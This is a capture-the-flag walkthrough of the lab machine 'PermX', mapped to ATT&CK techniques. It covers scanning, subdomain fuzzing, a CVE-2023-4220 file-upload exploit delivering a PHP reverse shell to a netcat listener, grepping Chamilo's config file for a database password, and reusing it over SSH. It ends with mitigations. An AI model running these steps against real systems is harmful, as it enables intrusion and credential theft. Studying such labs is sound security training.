Table of Contents Link to heading


Reconnaissance Link to heading

T1595.002 - Active Scanning: Vulnerability Scanning Link to heading

Initial Reconnaissance with nmap Link to heading

  • Objective: Discover active services and versions running on the target.

  • Purpose: Identifying services and their versions helps find potential vulnerabilities.

  • Explanation: The nmap scan targets the host to list open ports and reveal detailed service information.

    Command:

    nmap -sC -sV -Pn 10.10.11.23
    
  • Explanation: The nmap command runs a scan on the target’s IP, seeking open ports and available services. It uses flags to:

    • -sC: Run default Nmap scripts, which test for basic vulnerabilities.
    • -sV: Identify the version of each detected service.
    • -Pn: Skip host discovery and treat the target as if it’s online, which can bypass firewall rules that block ping requests.
  • Output:

    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 e2:5c:5d:8c:47:3e:d8:72:f7:b4:80:03:49:86:6d:ef (ECDSA)
    |_  256 1f:41:02:8e:6b:17:18:9c:a0:ac:54:23:e9:71:30:17 (ED25519)
    80/tcp open  http    Apache httpd 2.4.52
    |_http-title: eLEARNING
    |_http-server-header: Apache/2.4.52 (Ubuntu)
    
  • Interpretation:

    • Port 22 is open and running OpenSSH 8.9p1, suggesting potential SSH access.
    • Port 80 is open and hosts an Apache HTTP server with a page title “eLEARNING,” indicating a web-based application on this port. The server type hints at a specific service that may be exploitable based on known vulnerabilities in Apache or web applications.

T1596.004 - Search Open Websites/Domains Link to heading

Subdomain Enumeration with ffuf Link to heading

  • Objective: Enumerate subdomains to identify additional web applications or services.

  • Purpose: Discovering subdomains broadens the attack surface by revealing alternative endpoints, which may have weaker security.

  • Explanation: Using ffuf with a wordlist to test for responsive subdomains by including a “Host” header with various entries.

    Command:

    ffuf -u http://permx.htb -H "Host: FUZZ.permx.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -mc 200
    
  • Explanation: ffuf is used to brute-force subdomains by specifying the FUZZ placeholder in the HTTP Host header.

    • -u http://permx.htb: Specifies the main domain to fuzz.
    • -H "Host: FUZZ.permx.htb": Customizes the Host header to test various subdomains.
    • -w: Specifies a wordlist for subdomain names.
    • -mc 200: Only show responses with HTTP status 200 (OK), indicating active subdomains.
  • Output:

    www                     [Status: 200, Size: 36182, Words: 12829, Lines: 587, Duration: 22ms]
    lms                     [Status: 200, Size: 19347, Words: 4910, Lines: 353, Duration: 49ms]
    
  • Interpretation:

    • The www and lms subdomains were identified as accessible, each returning HTTP status code 200. This suggests two potential points of interest: www.permx.htb and lms.permx.htb, with lms.permx.htb likely hosting the Chamilo LMS application based on prior observations of the page title.

Initial Access Link to heading

T1190 - Exploit Public-Facing Application Link to heading

Exploit: CVE-2023-4220 Link to heading

  • Objective: Gain a foothold on the target system by exploiting a vulnerability in the Chamilo LMS.

  • Purpose: CVE-2023-4220 permits unrestricted file uploads, leading to possible remote code execution (RCE) and server compromise.

  • Explanation: Using a publicly available exploit, a PHP reverse shell payload is uploaded to execute commands on the server.

    Steps:

    1. Prepare Reverse Shell: A PHP reverse shell script from PentestMonkey is used.

    2. Start Listener: Begin listening on port 9001.

      nc -lvnp 9001
      
      • nc: Netcat utility for listening or connecting over TCP/UDP.
      • -lvnp 9001: Listen verbosely (v) on port 9001 and prevent DNS lookups (n).
    3. Run Exploit:

      ./CVE-2023-4220.sh -f ./shell.php -h http://lms.permx.htb/ -p 9001
      
      • -f ./shell.php: Specifies the shell file to upload.
      • -h http://lms.permx.htb/: Specifies the LMS subdomain.
      • -p 9001: Port to establish the reverse shell connection.
  • Output:

    • Reverse shell connects, providing an interactive shell on the server under the www-data user.
  • Interpretation: Successfully exploited the Chamilo LMS application to gain a www-data shell, confirming that CVE-2023-4220 vulnerability exists and is exploitable on this system.


Credential Access Link to heading

T1552.001 - Credentials in Files Link to heading

Accessing Configuration Files for Credentials Link to heading

  • Objective: Extract database and system credentials stored in Chamilo configuration files.

  • Purpose: Configuration files may contain cleartext credentials that allow further access to databases or remote services.

  • Explanation: Chamilo LMS stores settings in configuration.php, including database credentials, which can be accessed directly by the www-data user.

    Command:

    grep -E '^[^/]*\$_configuration\[' /var/www/chamilo/app/config/configuration.php
    
    • grep -E '^[^/]*\$_configuration\[': Regular expression search in configuration.php for lines beginning with $_configuration.
    • This command lists variables containing sensitive data like usernames and passwords.
  • Output:

    $_configuration['db_user'] = 'chamilo';
    $_configuration['db_password'] = '03F6lY3uXAP2bkW8';
    
  • Interpretation: The database username and password were retrieved. If the same credentials are reused for SSH or other services, they can enable further access. Here, the username and password are confirmed as valid SSH credentials for the mtz user.


Lateral Movement Link to heading

T1021.001 - Remote Services: SSH Link to heading

SSH Access with Recovered Credentials Link to heading

  • Objective: Use recovered credentials to log in via SSH and access files on the system as mtz.

  • Purpose: SSH provides a stable and secure connection, allowing for further reconnaissance and data extraction.

  • Explanation: Using the Chamilo database credentials, we attempt an SSH login.

    Command:

  • Output:

    mtz@permx:~$ ls
    user.txt
    
  • Interpretation: Successful login confirms that mtz’s SSH password was reused in Chamilo LMS, granting access to user.txt and verifying control over the mtz account on the system.


Conclusion Link to heading

In this exercise, we exploited the PermX machine by leveraging service enumeration, a known vulnerability, and insecure credential storage. The step-by-step methodology emphasized:

  • Service and Subdomain Discovery: Uncovering exposed services, including an LMS vulnerable to RCE.
  • Exploitation of Public Vulnerabilities: Using CVE-2023-4220 to gain initial access.
  • Credential Harvesting and Reuse: Extracting database credentials from configuration files, then reusing them for SSH access.

Key mitigations include restricting public access to sensitive applications, updating software to patch known vulnerabilities, and enforcing unique passwords across different services.